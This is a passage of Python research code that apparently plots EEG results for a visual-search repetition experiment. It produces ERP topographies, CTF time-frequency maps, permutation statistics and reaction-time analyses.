mne.viz.plot_topomap(T, info['info'], names = info['ch_names'], show_names = False, show = False, axes = ax, cmap = cm.jet, vmin = -7,vmax = 5) idx_cntr += 1 plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'cnd_topos_{}.pdf'.format(header))) plt.close() # create figure # loop over conditions for block in ['var','rep']: idx_cntr = 1 plt.figure(figsize = (40,10)) # loop over time segments for start_seg in segments: # select time window of interest s, e = [np.argmin(abs(times - t)) for t in (start_seg,start_seg+0.01)] # extract mean TOPO for window of interest if block == 'var': ax = plt.subplot(1, segments.size ,idx_cntr, title = '{0:.2f}'.format(start_seg)) cnd = cnds[:2] elif block == 'rep': ax = plt.subplot(1, segments.size ,idx_cntr) cnd = cnds[-2:] T = np.mean(np.stack( [topo[j][cnd[0]][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) - np.mean(np.stack( [topo[j][cnd[1]][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) print T.min(), T.max() im = mne.viz.plot_topomap(T, info['info'], names = info['ch_names'], show_names = False, show = False, axes = ax, cmap = cm.jet, vmin = -2,vmax = 2) idx_cntr += 1 plt.tight_layout() plt.savefig(self.FolderTracker(['poster','erp'], filename = 'cnd-diff_{}_{}.pdf'.format(header,block))) plt.close() ### CTF PLOTS def plotCTF(self, header = 'target', cnd_name = 'cnds', ctf_name = 'ctf_alpha'): ''' ''' ctfs, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = header, cnd_name = cnd_name, ctf_name = ctf_name) power = 'total' if header == 'target': cnds = ['DvTv_0', 'DvTv_3','DvTr_0','DvTr_3'] elif header == 'dist': cnds = ['DvTv_0', 'DvTv_3','DrTv_0','DrTv_3'] #norm = MidpointNormalize(midpoint=0) for cnd in cnds: plt.figure(figsize = (40,15)) plt.tick_params(direction = 'in', length = 5) xy = np.squeeze(np.stack([np.mean(np.mean(ctfs[i][cnd]['ctf']['total'],1),2) for i in range(len(ctfs))])) xy = np.mean(xy,0) xy = np.hstack((xy,xy[:,0].reshape(-1,1))).T plt.imshow(xy, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],-180,180], vmin = 0.0, vmax = 0.45) plt.colorbar() plt.savefig(self.FolderTracker(['poster', 'ctf'], filename = 'ctf_{}_{}.pdf'.format(header,cnd))) plt.close() def ctfReader(self, sj_id = 'all', channels = 'all_channels_no_eye', header = 'target_loc',ctf_name = '*_slopes_all.pickle', fband = 'all'): ''' Reads in preprocessed CTF data sj_id (str): channels (str): name of channel folder that contains ctf data header (str): CTF tuned to target location or distractor ctf_name (str): name of preprocessed ctfs fbanc (str): frequency band(s) of interest Returns - - - - ctf (dict): dictionary of ctfs as specified by ctf_name info (dict): EEG object used for plotting times (array): times shifted in time by 0.25 such that 0 ms is target display onset ''' if sj_id == 'all': files = glob.glob(self.FolderTracker(['ctf',channels,'{}_loc'.format(header)], filename = ctf_name)) else: ctf_name = '{}_' + ctf_name + '.pickle' files = [self.FolderTracker(['ctf',channels,'{}_loc'.format(header)], filename = ctf_name.format(sj)) for sj in sj_id] ctf = [] for file in files: print(file) # resad in classification dict with open(file ,'rb') as handle: ctf.append(pickle.load(handle)) with open(self.FolderTracker(['ctf',channels, '{}_loc'.format(header)], filename = '{}_info.pickle'.format(fband)),'rb') as handle: info = pickle.load(handle) times = info['times'] - 250 return ctf, info, times def erpReader(self, header, erp_name): ''' Reads in 
preprocessed EEG data Arguments - - - - - header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps Returns - - - - erp (dict): dictionary of erps as specified by erp_name info (dict): EEG object used for plotting times (array): times shifted in time by 0.25 such that 0 ms is target display onset ''' # read in data and shift timing with open(self.FolderTracker(['erp','{}_loc'.format(header)], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: erp = pickle.load(handle) with open(self.FolderTracker(['erp','{}_loc'.format(header)], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) times = info['times'] - 0.25 return erp, info, times def rawCTF(self, header, ctf_name): ''' ''' if header == 'dist_loc': conditions = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] elif header == 'target_loc': conditions = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] # read in data raw, info, times = self.ctfReader(sj_id = 'all' ,channels = 'all_channels_no-eye', header = header, ctf_name = ctf_name) s, e = [np.argmin(abs(times - t)) for t in (150,200)] # read in info for topoplot with open(self.FolderTracker(['erp',header], filename = 'plot_dict.pickle') ,'rb') as handle: info_viz = pickle.load(handle) for i, cnd in enumerate(conditions): plt.figure(figsize = (30,10)) ax = plt.subplot(2,1, 1, title = cnd, ylabel = 'channels', xlabel = 'time (ms)') ctf = np.mean(np.dstack([np.mean(raw[sj][cnd]['ctf']['raw_eeg'], axis = (0,2)) for sj in range(len(raw))]),2) ctf = np.vstack((ctf.T,ctf[:,0])) plt.imshow(ctf, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],1,6]) for loc in range(6): ax = plt.subplot(2,6, loc + 7, title = str(loc)) w = np .mean(np.array([np.mean(raw[sj][cnd]['W']['raw_eeg'], axis = (0,2)) for sj in range(len(raw))]),0) im = mne.viz.plot_topomap(np.mean(w[s:e,loc,:],0), info_viz['info'], names = info_viz['ch_names'], show_names = False, show = False, axes = ax, cmap = cm.jet, vmin = -4.5, vmax = 4.5 ) sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'raw-{}-{}.pdf'.format(header, cnd))) plt.close() def timeFreqCTF(self, header, cnd_name, perm = True, p_map = False): ''' ''' PO = Permutation() slopes, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = header, cnd_name = cnd_name, ctf_name = 'slopes_all', fband = 'all') #if perm: # slopes, info, times = self.ctfReader(sj_id = [2,5,6,7,10,13,14,15,18,19,22,23,24], # channels = 'all_channels_no-eye', header = header, ctf_name = 'slopes_perm_all', fband = 'all') freqs = (info['freqs'].min(), info['freqs'].max()) if header == 'dist': conditions = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] elif header == 'target': conditions = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] if cnd_name == 'all': plt.figure(figsize = (20,15)) plt.tick_params(direction = 'in', length = 5) xy = np.stack([slopes[j]['all']['total'] for j in range(len(slopes))]) p_vals = signedRankArray(xy, 0) h,_,_,_ = FDR(p_vals) XY = np.mean(xy,axis = 0) XY[~h] = 0 plt.imshow(XY, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[-1]], vmin = 0, vmax = 0.20) plt.colorbar() plt.savefig(self.FolderTracker(['poster', 'ctf'], filename = '{}-all-freqs.pdf'.format(header))) plt.close() else: for power in ['evoked', 'total']: crange = (-0.15,0.15) repeat = [] variable = [] plt.figure(figsize = (20,15)) data = [] plt_idx = 
[1,2,4,5] for i, cnd in enumerate(conditions): ax = plt.subplot(2,3, plt_idx[i], title = cnd, ylabel = 'freqs', xlabel = 'time (ms)') xy = np.stack([slopes[j][cnd][power] for j in range(len(slopes))])[:,:6,:] data.append(xy) p_vals = signedRankArray(xy, 0) h,_,_,_ = FDR(p_vals) XY = np.mean(xy,axis = 0) XY[~h] = 0 if 'r' in cnd: repeat.append(xy) else: variable.append(xy) plt.imshow(XY, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],18], vmin = crange[0], vmax = crange[1]) plt.axvline(x=-250, ls = '--', color = 'white') plt.axvline(x=0, ls = '--', color = 'white') plt.colorbar(ticks = (crange[0],crange[1])) plt_idx = [3,6] for i, cnd in enumerate(['var','rep']): ax = plt.subplot(2,3 , plt_idx[i], title = cnd, ylabel = 'freqs', xlabel = 'time (ms)') if i == 0: X, Y = data[0], data[1] else: X, Y = data[2], data[3] sig_cl = PO.clusterBasedPermutation(X, Y) plt.imshow(sig_cl, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],18]) plt.colorbar() plt.tight_layout() if perm: if p_map: plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'tf-p_map_{}_{}.pdf'.format(header, power))) else: plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'tf_{}_{}.pdf'.format(header, power))) else: plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'tf_{}_{}.pdf'.format(header, power))) plt.close() def threeDSlopes(self, header): ''' ''' if header == 'target_loc': cnds = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] elif header == 'dist_loc': cnds = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] # read in data ctfs, info, times = self.ctfReader(sj_id = 'all', channels = 'all_channels_no-eye', header = header, ctf_name = 'ctf_all', fband = 'all') # get X (time),Y (channel), Z data (channel response) X = info['times'][::info['downsample']] Y = np.arange(7) X, Y = np.meshgrid(X, Y) power = 'total' for fr, band in enumerate(info['freqs']): if band[1] <= 14: f = plt.figure(figsize = (20,15)) for i, cnd in enumerate(cnds): ax = f.add_subplot(2, 2, i + 1, projection='3d', title = cnd) if header == 'target_loc': crange = (0,1) elif header == 'dist_loc': crange = (-0.5,0.5) Z = np.dstack([np.mean(ctfs[j][cnd]['ctf'][power][fr,:], axis = (0,2)).T for j in range(len(ctfs))]) Z = np.vstack((Z.mean(axis =2), Z.mean(axis =2)[0,:])) surf = ax.plot_surface(X, Y, Z, cmap=cm.viridis, linewidth=0, antialiased=False, rstride = 1, cstride = 1, vmin = crange[0], vmax = crange[1]) ax.set_zlim(crange) f.colorbar(surf, shrink = 0.5, ticks = crange) plt.tight_layout() plt.savefig(self.FolderTracker(['ctf','all_channels_no-eye','MS-plots'], filename = 'ctfs_{}_{}-{}.pdf'.format(header,band[0],band[1]))) plt.close() ### BDM PLOTS ### ERP PLOTS def topoChannelSelection(self, header, topo_name, erp_window = dict(P1 = (0.09, 0.13), N1 = (0.15, 0.2), N2Pc = (0.18, 0.25), Pd = (0.25, 0.3))): ''' Creates topoplots for time windows of interest. Can be used to select which electrodes shows the largest component (averaged across all conditions) NOTE: SHOULD THIS BE ALL CONDITIONS OR ONLY THE CONDITIONS OF INTEREST??????? Arguments - - - - - header (str): ERP tuned to target location or distractor topo_name (str): name of preprocessed evoked data erp_window (dict): dictionary of time windows of interest (tuple). 
Key of dict is the name of the component ''' # read in data and shift timing topo, info, times = self.erpReader(header, topo_name) # first plot continuous segments of data plt.figure(figsize = (30,30)) for idx, tp in enumerate(np.arange(-0.25,0.35, 0.01)): # select time window of interest s, e = [np.argmin(abs(times - t)) for t in (tp,tp+0.01)] # extract mean TOPO for window of interest T = np.mean(np.stack( [topo[j]['all'][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) ax = plt.subplot(6,10 ,idx + 1, title = '{0:.2f}'.format(tp)) im = mne.viz.plot_topomap(T, info['info'], names = info['ch_names'], show_names = False, show = False, axes = ax, cmap = cm.jet, vmin = -7,vmax = 5) plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'evoked-all_{}.pdf'.format(header))) plt.close() # loop over all ERP components of interest for erp in erp_window.keys(): # select time window of interest s, e = [np.argmin(abs(times - t)) for t in erp_window[erp]] # extract mean TOPO for window of interest T = np.mean(np.stack( [topo[j]['all'][:,s:e] for j in topo.keys()], axis = 0), axis = (0,2)) # create figure plt.figure(figsize = (10,10)) ax = plt.subplot(1,1 ,1, title = 'erp-{}'.format(header)) im = mne.viz.plot_topomap(T, info['info'], names = info['ch_names'], show_names = True, show = False, axes = ax, cmap = cm.jet) plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'evoked-{}-{}.pdf'.format(erp, header))) plt.close() def erpInspection(self, header, erp_name): ''' Shows ERPs across whole time indow collapsed across conditions. Can also be used with topoChannelSelection to select channels with largest component Arguments - - - - - header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps ''' # read in data and shift timing erps, info, times = self.erpReader(header, erp_name) # extract mean ERP ipsi = np.mean(np.stack( [erps[key]['all']['ipsi'] for key in erps.keys()], axis = 0), axis = 0) contra = np.mean(np.stack( [erps[key]['all']['contra'] for key in erps.keys()], axis = 0), axis = 0) # initiate figure plt.figure(figsize = (20,10)) for plot, data in enumerate([ipsi, contra]): ax = plt.subplot(1,2 , plot + 1, title = ['ipsi','contra'][plot], ylabel = 'mV') ax.tick_params(axis = 'both', direction = 'outer') for i, erp in enumerate(data): plt.plot(times, erp, label = '{}-{}'. format(erps['2']['all']['elec'][0][i], erps['2']['all']['elec'][1][i])) plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'elecs-{}.pdf'.format(header))) plt.close() def ipsi_contra_ERPS(self, elecs, header, erp_name): ''' plots ipsilateral and contalateral waveforms seperately. 
Arguments - - - - - elecs (list): list of electrodes used for ERP's header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps ''' PO = Permutation() color_var = 'blue' if header == 'target_loc': color_rep = 'green' erp_types = ['DvTr_0','DvTr_3'] elif header == 'dist_loc': erp_types = ['DrTv_0','DrTv_3'] color_rep = 'red' # read in data and shift timing erps, info, times = self.erpReader(header, erp_name) # get indices of electrodes of interest e_idx = np.array([erps[erps.keys()[0]]['all']['elec'][0].index(e) for e in elecs]) plt.figure(figsize = (30,20)) # plot ipsi and contralateral erps with bootsrapped error bar for idx, plot in enumerate([1,2,4,5]): ax = plt.subplot(2,3 , plot, title = ['Var-Ipsi','Rep-Ipsi','Var-Contra','Rep-Contra'][idx], ylabel = 'mV') ax.tick_params(axis = 'both', direction = 'outer') perm = [] if plot == 1 or plot == 4: cnds = ['DvTv_0','DvTv_3'] color= color_var elif plot == 2 or plot == 5: cnds = erp_types color = color_rep for i, cnd in enumerate(cnds): if plot == 1 or plot == 2: if e_idx.size > 1: erp = np.vstack([erps[str(key)][cnd]['ipsi'][e_idx].mean(0) for key in erps.keys()]) else: erp = np.vstack([erps[str(key)][cnd]['ipsi'][e_idx] for key in erps.keys()]) elif plot == 4 or plot == 5: if e_idx.size > 1: erp = np.vstack([erps[str(key)][cnd]['contra'][e_idx].mean(0) for key in erps.keys()]) else: erp = np.vstack([erps[str(key)][cnd]['contra'][e_idx] for key in erps.keys()]) err, signal = bootstrap(erp) perm.append(erp) plt.plot(times, signal, label = '{}-{}'.format(cnd,str(elecs)), color = color, ls = ['-','--'][i]) plt.fill_between(times, signal + err, signal - err, alpha = 0.2, color = color) sig_cl = PO.clusterBasedPermutation(perm[0], perm[1]) plt.ylim(-7,5) plt.fill_between(times, -0.05, 0.05, where = sig_cl < 1, color = 'black', label = 'p < 0.05') plt.legend(loc = 'best') plt.axhline(y=0, ls = '--', color = 'grey') plt.axvline(x=-0.25, ls = '--', color = 'grey') plt.axvline(x=0, ls = '--', color = 'grey') sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'ipsi-contra_{}_erps.pdf'.format(header))) plt.close() def linkBehErp(self, elecs, header, erp_name, window = (0.27,0.33)): ''' elecs (list): list of electrodes used for ERP's header (str): ERP tuned to target location or distractor erp_name (str): name of preprocessed erps ''' # read in data and shift timing erps, info, times = self.erpReader(header, erp_name) # get indices of electrodes of interest e_idx = np.array([erps['1']['all']['elec'][0].index(e) for e in elecs]) # select time window of interest s, e = [np.argmin(abs(times - t)) for t in window] # read in beh and get RT reduction RT = [] for sj in erps.keys(): beh_files = glob.glob(self.FolderTracker(extension=[ 'beh', 'raw'], filename='subject-{}_ses_*.csv'.format(sj))) # get triggers logged in beh file beh = pd.concat([pd.read_csv(file) for file in beh_files]) beh =beh[beh['practice'] == 'no'] if header == 'dist_loc': RT.append( beh['RT'][beh['condition'] == 'DrTv_0'].values.mean() - beh['RT'][beh['condition'] == 'DrTv_3'].values.mean()) elif header == 'target_loc': RT.append( beh['RT'][beh['condition'] == 'DvTr_0'].values.mean() - beh['RT'][beh['condition'] == 'DvTr_3'].values.mean()) # get ERP reduction if e_idx.size > 1: if header == 'dist_loc': diff = (np.vstack([erps[str(key)]['DrTv_0']['contra'][e_idx].mean(0) for key in erps.keys()]) - \ np.vstack([erps[str(key)]['DrTv_0']['ipsi'][e_idx].mean(0) for key in erps.keys()])) - \ 
(np.vstack([erps[str(key)]['DrTv_3']['contra'][e_idx].mean(0) for key in erps.keys()]) - \ np.vstack([erps[str(key)]['DrTv_3']['ipsi'][e_idx].mean(0) for key in erps.keys()])) elif header == 'target_loc': diff = (np.vstack([erps[str(key)]['DvTr_0']['contra'][e_idx].mean(0) for key in erps.keys()]) - \ np.vstack([erps[str(key)]['DvTr_0']['ipsi'][e_idx].mean(0) for key in erps.keys()])) - \ (np.vstack([erps[str(key)]['DvTr_3']['contra'][e_idx].mean(0) for key in erps.keys()]) - \ np.vstack([erps[str(key)]['DvTr_3']['ipsi'][e_idx].mean(0) for key in erps.keys()])) diff = diff[:,s:e].mean(axis = 1) # do plotting sns.regplot(np.array(RT), diff) r, p = pearsonr(np.array(RT), diff) plt.title('r = {0:0.2f}, p = {1:0.2f}'.format(r,p)) plt.savefig(self.FolderTracker(['erp','MS-plots'], filename = 'corr-{}-{}.pdf'.format(elecs, header))) plt.close() def repetitionRaw(self): # read in data file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) # create pivot (only include trials valid trials from RT_filter) RT = beh.query("RT_filter == True") RT_piv = RT.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition'], aggfunc = 'mean') pivot_error = pd.Series(confidence_int(RT_piv.values), index = RT_piv.keys()) # plot conditions plt.figure(figsize = (10,10)) ax = plt.subplot(1,1,1, title = 'Repetition effect', ylabel = 'RT (ms)', xlabel = 'repetition', ylim = (300,650)) for i, cnd in enumerate(['DvTv','DrTv','DvTr']): RT_piv[cnd].mean().plot(yerr = pivot_error[cnd], label = cnd, color = ['blue','red','green'][i]) plt.xlim(-0.5,3.5) plt.xticks([0,1,2,3]) plt.legend(loc='best', shadow = True) sns.despine(offset=50, trim = False) plt.tight_layout() plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'repetition_effect.pdf')) plt.close() # and plot normalized data norm = RT_piv.values for i,j in [(0,4),(4,8),(8,12)]: norm[:,i:j] /= np.matrix(norm[:,i]).T pivot = pd.DataFrame(norm, index = np.unique(beh['subject_nr']), columns = RT_piv.keys()) pivot_error = pd.Series(confidence_int(pivot.values), index = pivot.keys()) ax = plt.subplot(1,2, 2, title = 'Normalized RT', ylabel = 'au', xlabel = 'repetition', ylim = (0.5,1), xlim = (0,4)) for cnd in ['DvTv','DrTv','DvTr']: popt, pcov = curvefitting(range(4),np.array(pivot[cnd].mean()),bounds=(0, [1,1])) pivot[cnd].mean().plot(yerr = pivot_error[cnd], label = '{0}: alpha = {1:.2f}; delta = {2:.2f}'.format(cnd,popt[0],popt[1])) plt.xlim(-0.5,3.5) plt.xticks([0,1,2,3]) plt.legend(loc='best', shadow = True) sns.despine(offset=10, trim = False) #plt.tight_layout() #plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'main_beh.pdf')) #plt.close() def spatialGradient(self, yrange = (350,500)): ''' ''' # read in data file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) # add spatial dist filter beh['dist_bin'] = abs(beh['dist_loc'] - beh['target_loc']) beh['dist_bin'][beh['dist_bin'] > 3] = 6 - beh['dist_bin'][beh['dist_bin'] > 3] # create pivot beh = beh.query("RT_filter == True") gradient = beh.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition','dist_bin'], aggfunc = 'mean') gradient_err = pd.Series(confidence_int(gradient.values), index = gradient.keys()) # Create pivot table and extract individual headers for .csv file (input to JASP) gradient_array = np.hstack((np.array(gradient.index).reshape(-1,1),gradient.values)) headers = ['sj'] + ['_'.join(np.array(labels,str)) for labels in 
product(*gradient.keys().levels)] np.savetxt(self.FolderTracker(['beh','analysis'], filename = 'gradient_JASP.csv'), gradient_array, delimiter = "," ,header = ",".join(headers), comments='') for cnd in ['DvTr','DrTv','DvTv']: plt.figure(figsize = (15,15 )) for i in range(4): ax = plt.subplot(2,2, i + 1, title = 'Repetition {}'.format(i) , ylim = yrange) if i % 2 == 0: plt.ylabel('RT (ms)') gradient[cnd].mean()[i].plot(kind = 'bar', yerr = gradient_err[cnd][i], color = 'grey') plt.tight_layout() plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'gradient_{}.pdf'.format(cnd))) plt.close() def primingCheck(self): ''' ''' # read in data file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) # filter out RT outliers DR = beh.query("RT_filter == True") # get effect of first repetition in distractor repetition block DR = DR.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition'], aggfunc = 'mean') DR = DR['DrTv'][1] - DR['DrTv'][0] # get priming effect (only look at chance repetitions within DvTv); first get repetitions and then filter out outliers beh['priming'] = np.nan beh['priming'] = beh['priming'].apply(pd.to_numeric) rep = False for i, idx in enumerate(beh.index[1:]): if (beh.loc[idx - 1,'dist_loc'] == beh.loc[idx,'dist_loc']) and \ (beh.loc[idx -1 ,'subject_nr'] == beh.loc[idx,'subject_nr']) and \ (beh.loc[idx - 1,'block_cnt'] == beh.loc[idx,'block_cnt']) and \ (rep == False) and beh.loc[idx,'RT_filter'] == True and beh.loc[idx - 1,'RT_filter'] == True: rep = True beh.loc[idx,'priming'] = beh.loc[idx,'RT'] - beh.loc[idx - 1,'RT'] else: rep = False # get priming effect PR = beh.pivot_table(values = 'priming', index = 'subject_nr', columns = ['block_type'], aggfunc = 'mean')['DvTv'] t, p = ttest_rel(DR, PR) # plot comparison plt.figure(figsize = (15,10)) df = pd.DataFrame(np.hstack((DR.values,PR.values)),columns = ['effect']) df['subject_nr'] = range(DR.index.size) * 2 df['block_type'] = ['DR'] * DR.index.size + ['PR'] * DR.index.size ax = sns.stripplot(x = 'block_type', y = 'effect', data = df, hue = 'subject_nr', size = 10,jitter = True) ax.legend_.remove() sns.violinplot(x = 'block_type', y = 'effect', data = df, color= 'white', cut = 1) plt.title('p = {0:.3f}'.format(p)) plt.tight_layout() sns.despine(offset=10, trim = False) plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'priming.pdf')) plt.close() def splitHalf(self, header, sj_id, index): ''' ''' if header == 'dist_loc': block_type = 'DrTv' elif header == 'target_loc': block_type = 'DvTr' # read in beh file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) # create pivot (only include trials valid trials from RT_filter) RT = beh.query("RT_filter == True") RT_piv = RT.pivot_table(values = 'RT', index = 'subject_nr', columns = ['block_type','repetition'], aggfunc = 'mean')[block_type] # get repetition effect and sort effect = RT_piv[3] - RT_piv[0] if sj_id != 'all': effect = effect[sj_id] if index == 'index': sj_order = np.argsort(effect.values) elif index == 'sj_nr': sj_order = effect.sort_values().index.values groups = {'high':sj_order[:sj_order.size/2], 'low':sj_order[sj_order.size/2:]} return groups, block_type def indDiffBeh(self): ''' ''' # read in data file = self.FolderTracker(['beh','analysis'], filename = 'preprocessed.csv') beh = pd.read_csv(file) RT = beh.query("RT_filter == True") RT_piv = RT.pivot_table(values = 'RT', index = 'subject_nr', columns = 
['block_type','repetition'], aggfunc = 'mean') target = RT_piv['DvTr'][0] - RT_piv['DvTr'][3] dist = RT_piv['DrTv'][0] - RT_piv['DrTv'][3] plt.figure(figsize = (30,10)) # plot correlation between target and distractor (repetition effect) r, p = pearsonr(target,dist) ax = plt.subplot(1,3, 1, title = 'r = {0:0.2f}, p = {1:0.2f}'.format(r,p)) sns.regplot(target, dist) plt.ylabel('distractor suppression') plt.xlabel('target facilitation') # plot individual learning effects (normalized data relative to first repetition) norm = RT_piv.values for i,j in [(0,4),(4,8),(8,12)]: norm[:,i:j] /= np.matrix(norm[:,i]).T normed_RT = pd.DataFrame(norm, index = np.unique(beh['subject_nr']), columns = RT_piv.keys()) ax = plt.subplot(1,3, 2, title = 'Distractor', xlabel = 'repetition', ylabel = 'RT (ms)') plt.plot(normed_RT['DrTv'].T) ax = plt.subplot(1,3, 3, title = 'Target', xlabel = 'repetition', ylabel = 'RT (ms)') plt.plot(normed_RT['DvTr'].T) plt.tight_layout() plt.savefig(self.FolderTracker(['beh','analysis','figs'], filename = 'individual.pdf')) plt.close() def timeFreqCTFInd(self, channel, header): ''' ''' # read in CTF data slopes, info = self.readCTFdata('all',channel, header, '*_slopes_all.pickle') times = info['times'] -250 freqs = (info['freqs'].min(), info['freqs'].max()) if header == 'dist_loc': conditions = ['DvTv_0','DvTv_3','DrTv_0','DrTv_3'] elif header == 'target_loc': conditions = ['DvTv_0','DvTv_3','DvTr_0','DvTr_3'] power = 'total' for sj in range(len(slopes)): crange = (-0.15,0.15) plt.figure(figsize = (20,15)) for i, cnd in enumerate(conditions): ax = plt.subplot(2,2, i + 1, title = cnd, ylabel = 'freqs', xlabel = 'time (ms)') xy = slopes[sj][cnd][power] plt.imshow(xy, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = crange[0], vmax = crange[1]) plt.axvline(x=-250, ls = '--', color = 'white') plt.axvline(x=0, ls = '--', color = 'white') plt.colorbar(ticks = (crange[0],crange[1])) plt.tight_layout() plt.savefig(self.FolderTracker(['ctf',channel,'figs','ind'], filename = 'tf_{}_{}.pdf'.format(sj,header))) plt.close() def splitTimeFreqCTF(self, channel, header, perm = False): ''' ''' sj_id = np.array([1,2,3,4,5,6,7,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23]) groups, block_type = self.splitHalf(header, sj_id, 'index') # read in ctf slopes, info = self.readCTFdata(sj_id,channel, header, '*_slopes_all.pickle') times = info['times'] freqs = (info['freqs'].min(), info['freqs'].max()) if perm: slopes_p, info = self.readCTFdata(sj_id, channel, header,'*_slopes_perm_all.pickle') crange = (-0.15,0.15) repeat = [] for power in ['total','evoked']: plt.figure(figsize = (20,15)) idx = 1 for rep in [0,3]: for group in groups.keys(): ax = plt.subplot(2,2, idx, title = 'rep_{}_{}'.format(rep,group), ylabel = 'freqs', xlabel = 'time (ms)') xy = np.stack([slopes[j]['{}_{}'.format(block_type,rep)][power] for j in groups[group]]) XY = np.mean(xy,axis = 0) if power == 'total' and rep == 3: repeat.append(np.swapaxes(xy,1,2)) if perm: xy_perm = np.stack([slopes_p[j]['{}_{}'.format(block_type,rep)][power] for j in groups[group]]) p_val, sig = permTTest(xy, xy_perm, p_thresh = 0.05) XY[sig == 0] = 0 plt.imshow(XY, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = crange[0], vmax = crange[1]) plt.axvline(x=0, ls = '--', color = 'white') plt.axvline(x=250, ls = '--', color = 'white') plt.colorbar(ticks = (crange[0],crange[1])) idx += 1 plt.tight_layout() if perm: 
plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'split_{}_{}.pdf'.format(header, power))) else: plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'split_noperm_{}_{}.pdf'.format(header, power))) plt.close() def clusterTestTimeFreq(self, variable, repeat, times, freqs, channel,header, power): ''' ''' plt.figure(figsize = (30,10)) ax = plt.subplot(1,3, 1, title = 'variable', ylabel = 'freqs', xlabel = 'time (ms)') print 'variable' T_obs_plot = permTestMask2D(variable, p_value = 0.05) # plot 3rd - 1st repetition plt.imshow(T_obs_plot.T, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = 0, vmax = 5) plt.colorbar(ticks = (0,5)) print 'repeat' ax = plt.subplot(1,3, 2, title = 'repeat', ylabel = 'freqs', xlabel = 'time (ms)') # plot 3rd - 1st repetition T_obs_plot = permTestMask2D(repeat, p_value = 0.05) plt.imshow(T_obs_plot.T, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = 0, vmax = 5) plt.colorbar(ticks = (0,5)) print 'interaction' ax = plt.subplot(1,3, 3, title = 'interaction', ylabel = 'freqs', xlabel = 'time (ms)') # plot repeat - variable T_obs_plot = permTestMask2D([variable[1] - variable[0], repeat[1] - repeat[0]], p_value = 0.05) plt.imshow(T_obs_plot.T, cmap = cm.jet, interpolation='none', aspect='auto', origin = 'lower', extent=[times[0],times[-1],freqs[0],freqs[1]], vmin = 0, vmax = 5) plt.colorbar(ticks = (0,5)) plt.tight_layout() plt.savefig(self.FolderTracker(['ctf',channel,'figs'], filename = 'TF_comparison_{}_{}.pdf'.format(header, power))) plt.close() def ipsiContraCheck(self, header, erp_name): ''' ''' # read in data with open(self.FolderTracker(['erp','dist_loc'], filename = 'plot_dict.pickle') ,'rb') as handle: info = pickle.load(handle) with open(self.FolderTracker(['erp','target_loc'], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: t_erps = pickle.load(handle) with open(self.FolderTracker(['erp','dist_loc'], filename = '{}.pickle'.format(erp_name)) ,'rb') as handle: d_erps = pickle.load(handle) print t_erps.keys(), d_erps.keys() plt.figure(figsize = (20,20)) titles = ['T0-left','T0-right', 'T3-left','T3-right','D0-left','D0-right','D3-left','D3-right'] for i, cnd in 